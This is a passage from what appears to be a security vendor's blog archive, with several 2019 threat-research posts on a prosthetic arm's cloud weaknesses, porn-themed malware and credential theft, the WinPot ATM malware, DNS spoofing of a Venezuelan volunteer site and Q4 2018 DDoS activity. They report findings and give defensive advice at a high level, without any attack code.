Like other IoT devices, the prosthetic arm sends statistics to the cloud, such as movement amplitudes, the arm’s positions, etc. And just like other IoT devices, this valuable invention must be checked for vulnerabilities.

In our research, we focused on those attack vectors that can be implemented without the arm owner’s knowledge. Below is a standard diagram of the arm’s interactions with the outside world.

Each arm is equipped with an embedded SIM card for sending statistical data. The SIM is needed to access the internet and send statistics and other information about the arm’s status. A connection is established to Motorica’s remote cloud, which is an interface for remotely monitoring the status of all registered biomechanical arms. Good thing about the arm’s current architecture – the connection between the arm and the cloud in unidirectional. This means that only the arm is sending data to the cloud, while the cloud sends nothing back. Yet, Motorica Inc says, they plan to implement this feature later.

The basic logic of the arm, such as movement directions, switching motors on or off, etc., are implemented in the C language. The cloud for receiving, processing and storing information is implemented based on the following technologies:

  • NodeJS – for backend,
  • ReactJS – for frontend,
  • MongoDB – database.
Arm-wrestling

At first, we decided to attack the logic of the arm. But soon we discovered that the C code is well-structured and has no vulnerabilities in it. However, the arm that we tested has only the basic functionality. Motorica Inc. wants to add more functions to its biomechanical limbs: smartphone interconnect, contactless payments and other useful features. From our point of view, all these new technologies must be tested for cybersecurity. Especially the ones that could be exploited for MiTM attacks.

Then we started to analyze the protocol used to send the statistics to the cloud and the logic for processing that information on the server. The initial findings showed that the data was sent using the insecure HTTP protocol. A little later we found some incorrect account operations and insufficient input validation that can be used by a remote attacker to:

  • gain access to information about all the accounts in the cloud including the logins and passwords (in plaintext) for all the prosthetic arms and administrators,
  • add or delete regular and privileged users (with administrator rights),
  • launch attacks against administrators via the cloud and then attack Motorica’s internal infrastructure,
  • NoSQL-injection,
  • cause denial of service for cloud administrator.

In our research we did not go deep into data analysis transferred between muscle sensors and the arm itself or study how the device is interconnected with contactless payment systems or smartphones. These look like very promising research fields for the next years.

What type of attackers might be interested in such attacks – getting prosthetic arm’ data? It’s difficult to say at this moment. However, when biomechanical limbs become more intelligent – attacks could be more beneficial to their perpetrators. Or, when it gets connected to the neuro-implanted brain-chip, the remote attacker will get access to something more valuable than money. Anyway, all IoT devices (and especially biomechanical ones) should be tested for cybersecurity issues at every stage of development.

If you create amazing technologies that are bigger and more important than just classical IoT devices, that help people, or even save lives – you have to check how your technology works, and whether there is a chance to attack your device and damage people. To prevent basic vulnerabilities, please follow the best coding practices, implement SDL, do security source code review, create a security champion in your development team, do external vulnerability researches and penetration testing. All these useful and much needed steps will increase the cybersecurity level of your devices and technologies.

2019. február 21.

Threats to users of adult websites in 2018

Introduction

2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms – Tumblr – announced it was banning erotic content (even though almost a quarter of its users consume adult content). In addition, the UK received the title of ‘The Second Most Porn-Hungry Country in the World‘ and is now implementing a law on age-verification for pornography lovers that will prohibit anyone below the age of 18 to watch this sort of content. This is potentially opening a world of new tricks for scammers and threat actors to take advantage of users. In addition, even commercial giant Starbucks declared a ‘holy war’ on porn as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.

Such measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active adult website user, who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This, and other examples confirm that adult content remains a controversial topic from both a social and cybersecurity standpoint.

It is no secret that digital pornography has long been associated with malware and cyberthreats. While some of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted research on the malware hidden in pornography and found out that such threats are both real and effective. One of the key takeaways of last year’s report was the fact that cybercriminals not only use adult content in multiple ways – from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims’ banking credentials and other personal information – but they also make money by stealing access to pornographic websites and reselling it at a cheaper price than the cost of a direct subscription.

Last year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.

It would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains one of the most sought after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.

That said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. As it turned out, some things have indeed changed.

Methodology and key findings

To measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how is it used in the wild. Using aggregated threat-statistics obtained from the Kaspersky Security Network – the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world – we measured how often and how many users of our products have encountered adult-content themed threats.

Additionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.

As a result, we discovered the following:

  • Searching for pornography online has become safer: in 2018, 650,000 users faced attacks launched from online resources. That is 36% less than in 2017 when more than a million of these attacks were detected.
  • Cybercriminals are actively using popular porn-tags to promote malware in search results. The 20 most popular make up 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than personal network to do this.
  • In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017, with more than 850,000 attempts to install such malware. The number of users attacked doubled, with 110,000 attacked PCs across the world.
  • The number of unique sales offers of credentials for premium accounts to adult content websites almost doubled to more than 10,000.
  • Porn-themed threats increased in terms of the number of samples, but declined in terms of variety: In 2018, Kaspersky Lab identified at least 642 families of PC threats disguised under one common pornography tag. In terms of their malicious function, these families were distributed between 57 types (76 last year). In most cases they are are Trojan-Downloaders, Trojans and AdWare.
  • 89% of infected files disguised as pornography on Android devices turned out to be AdWare.
  • In Q4 2018, there were 10 times as many attacks coming from phishing websites pretending to be popular adult content resources, compared to Q4 2017 when the overall figure reached 21,902 attacks.
Part 1 – Malware

As mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users’ computers from malicious websites is usually disguised as videos. Users who do not check the file extension and go on to download and open it, are sent to a webpage that extorts money. This is achieved by playing the video online or for free only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.

To do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called ‘black SEO’ techniques. This involves changing the malicious website content and description so it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.

According to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word ‘porn’), plus those that have the word ‘porn’ in the title. We checked if any of them pose any threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight against ‘black SEO’ activities and protecting users from malicious content.

Porn tags = Malware tags

Optimizing malicious websites so as to ensure that those wanting to view adult content will find them is not the only tool criminals explore in order to find the best ways of delivering infected files to victims’ devices. It turned out during our research that cybercriminals are disguising malware or not-a-virus files as video files and naming them using popular porn tags. A ‘porn tag’ is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users to quickly and conveniently find the video they are interested in. The not-a-virus type of threats is represented here by RiskTools, Downloaders and AdWare. Each type is not typically classified as malware, yet such applications may do something unwanted to users. AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.

To check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.

The overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub’s statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.

Perhaps one of the most interesting takeaways we got from the analysis of how malware and not-a-virus are distributed among porn tags, is that although we were able to identify as many as 100 of them, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. Although we couldn’t find perfect correlations between the top watched types of adult video on legitimate websites and the most often encountered porn-themed threats, the match between malicious pornography and safe pornography means that malware and not-a-virus authors follow trends set by the pornography-viewing community.

Moving forward, the overall picture surrounding porn-disguised threat types showed more changes in 2018 when compared to 2017. In 2018, we saw 57 variations of threats disguised as famous porn tags, from 642 families. For comparison, the figures in 2017 were 76 and 581 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus that are being distributed through pornography is decreasing.

The top three most popular classes of threats turned out to be Trojan-Downloader, with 45% of files, Trojan with 20% and AdWare, which is not a virus, with 9%, while in 2017 the top three were different: Trojan-Downloader was still there with 29%, exploits took the second place with 23% and Trojans accounted for around 19%.

Distribution of porn-themed threat types in 2017 Distribution of porn-themed threat types in 2018 Trojan-Downloader 29% Trojan-Downloader 45% Exploit 23% Trojan 20% Trojan 19% AdWare (not a virus) 9% AdWare (not a virus) 11% Worm 8% Worm 6% Virus 2% Virus 2% Downloader (not a virus) 2% RiskTool (not a virus) 2% Exploit 2% Downloader (not a virus) 2% Trojan-Dropper 2% Trojan-Dropper 1% UDS: DangerousObject 2% Other 5% Other 8%

Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network (download)

The most noticeable change in the overall picture is the large number of exploits in 2017: back then they accounted for almost a quarter of all infected files, while in 2018 they were not represented in the top 10. There is an explanation for the popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (the detection that describes multiple similar malware pieces) for files that exploited the vulnerability in the Windows Shell named CVE-2010-2568. However, the same detection name applies for another vulnerability in LNK – CVE-2017-8464. This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately raised a lot of interest amongst threat actors – thereby raising the bar in exploit detections. Within a year, the attacks on CVE-2017-8464 reduced significantly as most users patched their computers and malware writers went back to using classical malware aimed at more common file formats (such as JS, VBS, PE).

The rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim’s device, the threat actor could additionally download virtually any payload they want: from DDoS-bots and malicious ads clickers to password stealers or banking Trojans. As a result, a criminal would need to infect the victim’s device only once and would then be able to use it in multiple malicious ways.

2018 has also seen some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017. In 2018, however, they were on the decline and now account for 11%, with downloaders losing their place in the top-10 most prolific threats. So, while the attackers are using porn less as a decoy, they have yet to inject the malicious files with more harmful threats, such as Trojans and worms.

Mobile malware

Following technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.

The landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.

Malware name % Malware name % not-a-virus:HEUR:AdWare.AndroidOS.Agent.n 59.61% not-a-virus:HEUR:AdWare.AndroidOS.Agent.f 62.88% not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h 11.02% not-a-virus:HEUR:AdWare.AndroidOS.Agent.n 17.09% HEUR:Trojan-Ransom.AndroidOS.Zebt.a 5.33% not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h 9.62% HEUR:Trojan.AndroidOS.Loapi.b 3.76% HEUR:Trojan-Ransom.AndroidOS.Zebt.a 3.27% HEUR:Trojan-Ransom.AndroidOS.Small.snt 2.22% HEUR:Trojan.AndroidOS.Boogr.gsh 0.74% HEUR:Trojan-Dropper.AndroidOS.Agent.hb 1.93% HEUR:Trojan-Ransom.AndroidOS.Small.snt 0.74% not-a-virus:HEUR:AdWare.AndroidOS.Agent.f 1.90% UDS:DangerousObject.Multi.Generic 0.52% HEUR:Trojan-Ransom.AndroidOS.Small.as 1.54% HEUR:Trojan-Ransom.AndroidOS.Small.as 0.41% HEUR:Trojan-Ransom.AndroidOS.Small.cj 1.29% not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx 0.36% not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx 1.07% HEUR:Trojan-Ransom.AndroidOS.Small.cj 0.36%

Top-10 verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network

These threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018) but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.

Credential hunters

A specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on what kind of activities are they perform, to prevent emerging threats.

We particularly track botnets that are made of malware.Upon installation on a PC, this malware can monitor which web pages are opened, or create a fake one where the user enters their login and password credentials. Usually such programs are made for stealing money from online banking accounts, but last year we were surprized to discover that there are bots in these botnets that hunt for credentials to pornography websites.

Based on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans, attempting to steal credentials (Betabot, Neverquest and Panda). These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.

In 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable to ever more cybercriminals.

Another important shift that happened in 2018, was that malware families do not hunt for credentials to multiple websites. Instead, they focus on just two: mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.

Apparently Pornhub remains popular, not only to regular users of the web, but also to cybercriminals looking for another way of gaining illegal profits by selling user credentials.

Part 2 – Phishing and spam

Our previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.

These are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4, 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was 1,608. Within a year, in Q4 2018, the number of such attempts (21,902) was more than ten times higher.

The overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was 38,305. Leading the list of accessed phishing pages were those that were disguised as a Pornhub page. There were 37,144 attempts to visit the phishing version of the website, while there were only 1,161 attempts to visit youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low, other phishing categories may see detection results of millions of attempts per year. However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.

It is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing. Moreover, most search engines usually successfully block such phishing pages, so the most likely way to access them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.

Fake versions of popular pornography websites target users’ credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credentials capture is one of the most popular ways to target users, using pornography to implement phising fraud schemes. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video which can only be accessed if the user confirms they are over 18-years-old.

As the victim enters their password, the threat actor captures the credentials to the user’s social network account.

Pornographic content phishing can also be used to install malicious software. For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.

Needless to say, instead of downloading a video player, the user downloads malware.

Sometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.

Spam-scam

We have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of ‘standard’ advertising offering adult content on legitimate and illegal websites, this type of threat hasn’t been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam started to happen. Users started to receive messages containing an extortion letter with a demand to transfer bitcoins to fraudsters.

The scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam. This extortion is based purely on making threats.

2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated and were not only threatening the user, but also ‘proving’ the legitimacy of the scammers claims by providing the user with actual information about them.

In most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.

Furthermore, these e-mails have been sent out in more languages than previously found.

In reality, these mailings were based purely on the assumption that the target of such e-mails would hand over their credentials and that these would become profitable. The number of such scams grew in 2018.

Part 3 – Darknet insights

One of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions to access websites. It is often the case that users can register for pornography accounts through a ‘premium’ subscription model (that includes no advertisements and unlimited access to the adult website content). Otherwise, the website they want to access does not allow them to watch any free content at all unless they pay. At most, the user may see video previews for free but still be expected to make a payment to watch the full video. The opinions around such practice vary. Some people claim that money paid for porn “directly fuels the industry that supports the abuse, exploitation, and trafficking around the world”. Others argue that pornography is like most other commodities and people are willing to exchange money for it just as they would other kinds of entertainment, such as tv-series or music. Some though prefer to highlight examples of when adult content can result in people being denied their human rights.

Whether it is worth it or not, some users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access costs might scale from $120 to $150. This is where cybercriminals enter the fray.

The research on porn-related cyberthreats we did previously proved that there is a very well developed supply and demand chain for stolen credentials on the dark web. We conducted research on this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb – an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers’ feedback. All of them contained one to more than 3,000 offers for credentials to adult content websites. In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with of course, no legal guarantees of delivering on their promise).

The results of the research conducted in the last year showed that four of the researched markets that offered the widest range of stolen credentials provided users with more than 5,239 unique offers. The figure for 2018 showed that their number doubled, accounting for more than 10,000 offers on sale.

The quantity of accounts available ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers. However, the majority of offers promised to deliver credentials to only one account. Regardless of the type of account, the prices vary from $3 to $9 per offer, very rarely exceeding $10 – the same as back in 2017, with the vast majority of prices being limited to $6-$7 or the equal amount in bitcoins, which is 20 times cheaper than the most modest annual memberships. Getting access to an account illegally for a lower cost than a legal subscription is not the only appeal of buying such credentials on the dark web. There is the added appeal of anonymity, hiding behind other people’s credentials while watching pornography.

Conclusions and advice

Overall, the amount of downloadable malware disguised as pornography detected on users’ devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared. The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult-content may contain cybersecurity challenges other than the ‘classic’ infected pornography websites and video files armed with malware. These challenges should be addressed properly.

Another cybersecurity risk that adult content brings, which may be less obvious, is the misuse of corporate resources. As mentioned at the beginning of this report, the unsafe consumption of pornography from the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers not corporations, the fact that most consumers have job to go to every day, brings a certain risk to IT administrators responsible for securing corporate networks.

In order to consume and produce adult content safely, Kaspersky Lab advises the following:

For consumers:

  • Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.
  • Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.
  • If you wish to buy a paid subscription to an adult content website – purchase it only on the official website. Double check the URL of the website and make sure it is authentic.
  • Check any email attachments with a security solution before opening them –especially from dark web entities (even if they are expected to come from an anonymous source).
  • Patch the software on your PC as soon as security updates for the latest bugs are available.
  • Do not download pirated software and other illegal content. Even if you were redirected to the webpage from a legitimate website.
  • Use a reliable security solution with behavior-based anti-phishing technologies – such as Kaspersky Total Security, to detect and block spam and phishing attacks.
  • Use a robust security solution to protect you from malicious software and its actions – such as the Kaspersky Internet Security for Android.

For businesses:

  • Educate employees in basic security hygiene, and explain the policies on accessing web sites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.
  • Businesses can also block access to web sites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as Kaspersky Endpoint Security for Business. In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.
2019. február 19.

ATM robber WinPot: a slot machine instead of cutlets

Automation of all kinds is there to help people with their routine work, make it faster and simpler. Although ATM fraud is a very peculiar sort of work, some cybercriminals spend a lot of effort to automate it. In March 2018, we came across a fairly simple but effective piece of malware named WinPot. It was created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes. We called it ATMPot.

Example of WinPot interface – dispensing in action

The criminals had clearly spent some time on the interface to make it look like that of a slot machine. Likely as a reference to the popular term ATM-jackpotting, which refers to techniques designed to empty ATMs. In the WinPot case, each cassette has a reel of its own numbered 1 to 4 (4 is the max number of cash-out cassettes in an ATM) and a button labeled SPIN. As soon as you press the SPIN button (in our case it is greyed out because we are actually dispensing cash), the ATM starts dispensing cash from the corresponding cassette. Down from the SPIN button there is information about the cassette (bank note value and the number of bank notes in the cassette). The SCAN button rescans the ATM and updates the numbers under the SLOT button, while the STOP button stops the dispensing in progress.

We found WinPot to be an amusing and interesting ATM malware family, so we decided to keep a close eye on it.

Over the course of time, new samples popped up, each one with minor modifications. For example, a changed packer (like Yoda and UPX) or updated time period during which the malware was programmed to work (e.g, during March). If system time does not fall in with the preset period, WinPot silently stops operating without showing its interface.

The number of samples we had found was also reflected in the European Fraud Update published in the summer of 2018. It has a few lines about WinPot:

“ATM malware and logical security attacks were reported by nine countries. Five of the countries reported ATM related malware. In addition to Cutlet Maker (used for ATM cash-out) a new variant called WinPot has been reported…”

Same as Cutler Maker, WinPot is available on the (Dark)net for approximately 500 – 1000 USD depending on offer.

One of the sellers offers WinPot v.3 together with a demo video depicting the “new” malware version along with a still unidentified program with the caption “ShowMeMoney”. Its looks and mechanics seem quite similar to those of the Stimulator from the CutletMaker story.

Unidentified Stimulator-like sample from demo video

Winpot v3 sample from demo video

Due to the nature of ATM cash-out malware, its core functionality won’t change much. But criminals do encounter problems, so they invent modifications:

  • To trick the ATM security systems (using protectors or other ways to make each new sample unique);
  • To overcome potential ATM limitations (like maximum notes per dispense);
  • To find ways to keep the money mules from abusing their malware;
  • To improve the interface and error-handling routines.

We thus expect to see more modifications of the existing ATM malware. The preferred way of protecting the ATM from this sort of threat is to have device control and process whitelisting software running on it. The former will block the USB path of implanting the malware directly into the ATM PC, while the latter will prevent execution of unauthorized software on it. Kaspersky Embedded Systems Security will further help to improve the security level of the ATMs.

Kaspersky Lab products detect WinPot and its modifications as Backdoor.Win32.ATMPot.gen

Sample MD5:
821e593e80c598883433da88a5431e9d

2019. február 13.

DNS Manipulation in Venezuela in regards to the Humanitarian Aid Campaign

Venezuela is a country facing an uncertain moment in its history. Reports suggests it is in significant need of humanitarian aid.

On February 10th, Mr. Juan Guaidó made a public call asking for volunteers to join a new movement called “Voluntarios por Venezuela” (Volunteers for Venezuela). According to the media, it already numbers thousands of volunteers, willing to help international organizations to deliver humanitarian aid to the country. How does it work? Volunteers sign up and then receive instructions about how to help. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also the location of where they live:

This website appeared online on February 6th. Only a few days later, on February 11th, the day after the public announcement of the initiative, another almost identical website appeared with a very similar domain name and structure.

In fact, the false website is a mirror image of the original website, voluntariosxvenezuela.com

Both the original and the false website use SSL from Let’s Encrypt. The differences are as follows:

Original voluntariosxvenezuela.com website Deception website First day on the Internet, Feb 6th First day on the Internet, Feb 11th Whois information:

Registered on the name of Sigerist Rodriguez on Feb 4, 2019 Whois information:

Registered via GoDaddy using Privacy Protection feature on Feb 11, 2019 Hosted on Amazon Web Services Hosted first on GoDaddy and then on DigitalOcean

Now, the scariest part is that these two different domains with different owners are resolved within Venezuela to the same IP address, which belongs to the fake domain owner:

That means it does not matter if a volunteer opens a legitimate domain name or a fake one, in the end will introduce their personal information into a fake website.

Both domains if resolved outside Venezuela present different results:

Kaspersky Lab blocks the fake domain as phishing.

In this scenario, where the DNS servers are manipulated, it’s strongly recommended to use public DNS servers such as Google DNS servers (8.8.8.8 and 8.8.4.4) or CloudFlare and APNIC DNS servers (1.1.1.1 and 1.0.0.1). It’s also recommended to use VPN connections without a 3rd party DNS.

2019. február 7.

DDoS Attacks in Q4 2018

News overview

In Q4 2018, security researchers detected a number of new botnets, which included not only Mirai clones for a change. The fall saw increased activity on the part of the Chalubo bot, whose first attacks were registered in late August. Although the new malware employs snippets of Mirai code and the same persistence techniques as in the Xor.DDoS bot family, Chalubo is mostly a fresh product designed solely for DDoS attacks (for example, one of the detected samples was a SYN flood one). In October, Chalubo began to be seen more often in the wild; researchers detected versions created for different architectures (32- and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, PowerPC), which strongly suggests that the test period is over.

Also in October, details were released of the new Torii botnet, which Avast experts detected a month earlier. The botnet is aimed at a wide range of IoT devices and architectures. Its code differs significantly from Mirai — the malware is better hidden with a higher level of persistence, and thus promises to be far more dangerous. The malware collects and sends detailed information about infected devices to its C&C server, including host name and process ID, but for what purpose remains unclear. No DDoS attacks based on Torii botnets were detected, but experts believe that it’s still early days.

Another bot from last quarter, nicknamed DemonBot, caught the eye for hijacking Hadoop clusters through a vulnerability in the execution of YARN remote commands. This bot is not very complex technically, but dangerous in its choice of target: Hadoop clusters pack a major punch in terms of computing power because they are designed to handle Big Data. What’s more, being cloud-integrated, they can significantly boost DDoS attacks. Radware is currently monitoring 70 active servers that carry out up to 1 million infections per day. DemonBot is compatible not only with Hadoop clusters, but with most IoT devices, which makes it easy to re-aim at more numerous targets.

Last quarter, experts warned not only about new botnets, but new attack mechanisms, too. At the beginning of winter, for instance, it turned out that FragmentSmack was more widely deployable than previously thought. This attack exploits a vulnerability in the IP stack, which enables defective packets to be sent disguised as fragments of a larger message. The resource under attack tries to gather these packets into one, or places them in an endless queue, which takes up all its computational power and renders it incapable of handling legitimate requests. FragmentSmack was believed to be a threat only to Linux systems, but in December researchers from Finland discovered that it works fine with Windows 7, 8.1, 10, Windows Server, and 90 Cisco products.

Another promising attack method uses the CoAP protocol approved for widespread application in 2014. It is designed to facilitate communication between devices with a small amount of memory, making it ideal for the IoT. Since CoAP is based on the UDP protocol, it has inherited all the latter’s defects, which means it can be harnessed to boost DDoS attacks. Until now, this has not been a significant problem; however, experts note that during the November 2017–November 2018 period, the number of devices using CoAP increased almost 100 times, which is a major cause for concern.

Alongside new potential means for staging attacks, late 2018 saw the arrival of a new DDoS launch platform, called 0x-booter. First discovered on October 17, 2018, the service can support attacks with a capacity of up to 420 Gb/s based on just over 16,000 bots infected with Bushido IoT malware, a modified version of Mirai. Borrowing code from this kindred service, the platform is dangerous for its simplicity, low cost, and relative power: For just $20–50, anyone can use the simple interface to launch one of several types of attack against a target. According to the researchers, in the second half of October alone the service was utilized in more than 300 DDoS attacks.

It was with such resources that a powerful DDoS campaign was carried out throughout October against Japanese video game publisher Square Enix. The first wave came at the start of the month, coinciding with an attack on their French colleagues from Ubisoft (seemingly timed for the release of Assassin’s Creed Odyssey on October 4). The second wave hit a couple of weeks later. The attacks cut users off from the service for up to 20 hours.

Other than that, the end of the year was marked less by high-profile DDoS attacks than by attempts to reduce their frequency. Based on a report by cybersecurity researchers, the US Council on Foreign Relations (CFR) called for a global initiative of both public and private organizations to reduce the number of botnets.

Nor are law enforcement agencies asleep at the wheel. In October, US citizen Austin Thompson was found guilty of organizing a number of DDOS attacks in 2013–14. His victims included video game streamers as well as major game developers EA, Sony, Microsoft, and others.

In early December, British teenager George Duke-Cohan, who organized DDoS attacks against IT blogger Brian Krebs, the DEF CON convention, and government organizations in several countries, was sentenced to three years in prison — but not as yet for these incidents, but for making bomb hoax threats to numerous British schools and San Francisco Airport. Further charges could be brought against him in the US.

